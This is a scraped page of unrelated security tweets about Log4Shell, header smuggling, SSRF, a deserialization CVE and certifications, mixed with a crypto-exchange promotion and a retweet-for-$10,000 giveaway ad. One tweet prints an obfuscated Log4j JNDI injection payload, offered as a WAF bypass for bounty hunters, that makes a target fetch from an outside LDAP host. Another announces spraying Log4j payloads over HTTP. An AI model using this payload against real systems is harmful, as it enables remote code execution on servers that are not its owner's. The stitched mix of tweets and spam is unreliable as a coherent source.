🔥The 9th Round of Easy Loan, Earn $40 Reward is in progress❗️ ⏰ Promotion Period: January 15th - Feburary 15th, 2025 👉 Register now and check more details at gate.io/campaigns/358

Log4j is out, plenty of negativity around #BTC - best time for some drinks.

What people seem to miss: The #Log4Shell vulnerability isn't just a RCE 0day. It's a vulnerability that causes hundreds and thousands of 0days in all kinds of software products. It's a 0day cluster bomb.

Gonna start deliberately sending log4j payloads over HTTP to see what ISPs are logging

Log4shell - using the vulnerability to patch the vulnerability - very clever github.com/Cybereason/Log…

CVE-2021-23758 AjaxPro.NET #Deserialization #RCE mp.weixin.qq.com/s/7y-iyMMZAoN4…

🎉 I'm going to give one random person that retweets this $10,000. Because I’d rather spend my ad budget on you than BigTech 👩‍💻 I'm trying to promote my site Remote OK which helps you find a remote job so you don't need to go back to the office 💖 Thx! remoteok.com/?ref=twga2021

So I share the last WAF bypass for log4j injection. WAF is OK but don't rely on them, they are fragile! Patch instead. ${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://mydogsbutt.com:1389/o} To bounty hunters: go go go! #bugbountytips

Content Discovery and Param Miner in Burp found some hidden directory and parameter that was vulnerable to Log4j. The rest of the app was not vulnerable. CRAZY!😲

No doubt Daniel Thatcher's HTTP Header smuggling research made it to top 10 for 2021. The article presents a simple yet powerful methodology to look for HTTP header parsing discrepancies leading to smuggling, bypasses etc. intruder.io/research/pract…

For the past two weeks, I've been targeted in an extremely thorough social engineering scam that nearly cost me all of my ETH. I'm super lucky to have made it through unscathed. Here's the story 👇

Here it is: mrd0x.com/bypass-2fa-usi…

.Thái Vũ and I got to escalate a limited SSRF (CVE-2019-8451) on a BBP to extract AWS security credentials on the new metadata endpoint (IMDSv2) which is designed to block SSRF by rejecting unauthenticated GET and requiring valid token to be passed in the header. It was fun!

In 2010, WikiLeaks released a classified document. A list of infrastructure critical to U.S national security. The government listed a Trans-Atlantic cable. 3 years ago, 19-year-old me gained ADMIN access to that cable (and another; shared codebase). 🧵Here's how I found it

Ahead of the ISO 27001:2022 release, the ISO 27002:2022 update has recently been issued, outlining a restructure of the standard & several new controls. Dionach has created a high-level overview of this to help orgs prepare for ISO 27001:2022. bit.ly/3EOdIzf

After 5 years of work, security.txt is officially an RFC. I am pleased to announce RFC 9116: rfc-editor.org/rfc/rfc9116. I would like to use this opportunity to thank those who made this possible. Thank you. ❤️

The inconsistencies between reverse proxies and the back-end, always bring interesting attack vectors.

Hooray - just passed the #AWS SCS-C01 Security Specialty certification! Definitely a hard exam, but totally worth it as I've learnt a ton of AWS #infosec specifics which should help with security consulting for cloud solutions.

Join us for a live masterclass run by @CIISecHQ on July 20th at 16.30 BST. Presented by Technical Consultant, Flaviu Popescu, we'll look at cryptojacking and the risk it poses to organisations - including a live simulation. Sign up for the event here - lnkd.in/epGMapid